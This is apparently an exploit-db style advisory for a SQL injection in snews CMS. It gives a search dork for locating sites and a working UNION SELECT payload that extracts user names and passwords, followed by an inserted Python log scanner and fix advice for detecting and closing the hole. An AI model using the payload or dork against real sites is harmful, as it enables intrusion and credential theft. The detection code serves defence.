Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Test platform: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL PoC:

http://www.2cto.com/snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/**
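A defender-side check for this injection point, added here as an illustration (it is not part of the original advisory or of the snews project): a small Python scanner over constructed web-server access-log lines that URL-decodes the `id` parameter, replaces the `/**/` inline comments the PoC above uses in place of whitespace, and flags any value that is not a plain integer, reporting UNION...SELECT payloads separately. The log lines, client addresses and the second and third request shapes are constructed sample data; only the first injected request mirrors the PoC quoted on the page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original advisory).
# Line 2 mirrors the PoC request shown on the page; lines 3 and 4 are
# constructed variants (plain URL-encoded spaces, and a non-numeric id).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2013:10:00:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/** HTTP/1.1" 200 4870
203.0.113.9 - - [10/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=-23%20UNION%20ALL%20SELECT%201,2,3 HTTP/1.1" 200 4870
203.0.113.7 - - [10/Jan/2013:10:00:15 +0000] "GET /snews/snews.php?act=shownews&id=abc HTTP/1.1" 200 5120
"""

# Common-log-format request line: client ip ... "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"'
)
# Inline SQL comment, used by the PoC as a whitespace substitute.
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
# UNION [ALL] SELECT after normalisation.
UNION_RE = re.compile(r'\bunion\b\s+(?:all\s+)?\bselect\b')


def normalize(value: str) -> str:
    """URL-decode twice (to catch double-encoded payloads), turn inline
    comments into spaces, collapse whitespace and lowercase."""
    decoded = value
    for _ in range(2):
        decoded = unquote_plus(decoded)
    decoded = COMMENT_RE.sub(' ', decoded)
    return re.sub(r'\s+', ' ', decoded).strip().lower()


def classify_id(raw_id: str):
    """Return None for a benign integer id, otherwise a short reason.

    The allowlist comes first: a numeric id can never carry SQL, so anything
    else is anomalous even if no known signature matches."""
    norm = normalize(raw_id)
    if re.fullmatch(r'-?\d+', norm):
        return None
    if UNION_RE.search(norm):
        return 'union-select'
    return 'non-numeric id'


def scan_log(text: str):
    """Yield (client_ip, raw id value, reason) for every suspicious
    shownews request in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw_id in params.get('id', []):
            reason = classify_id(raw_id)
            if reason:
                hits.append((ip, raw_id, reason))
    return hits


if __name__ == '__main__':
    for ip, raw_id, reason in scan_log(SAMPLE_LOG):
        print(f'{ip}\t{reason}\t{raw_id[:60]}')
```

The integer allowlist in `classify_id` is also the fix on the application side: `id` should be cast to an integer, or bound as a parameter of a prepared statement, before it reaches the query, which closes the injection regardless of how the payload is encoded.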
Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*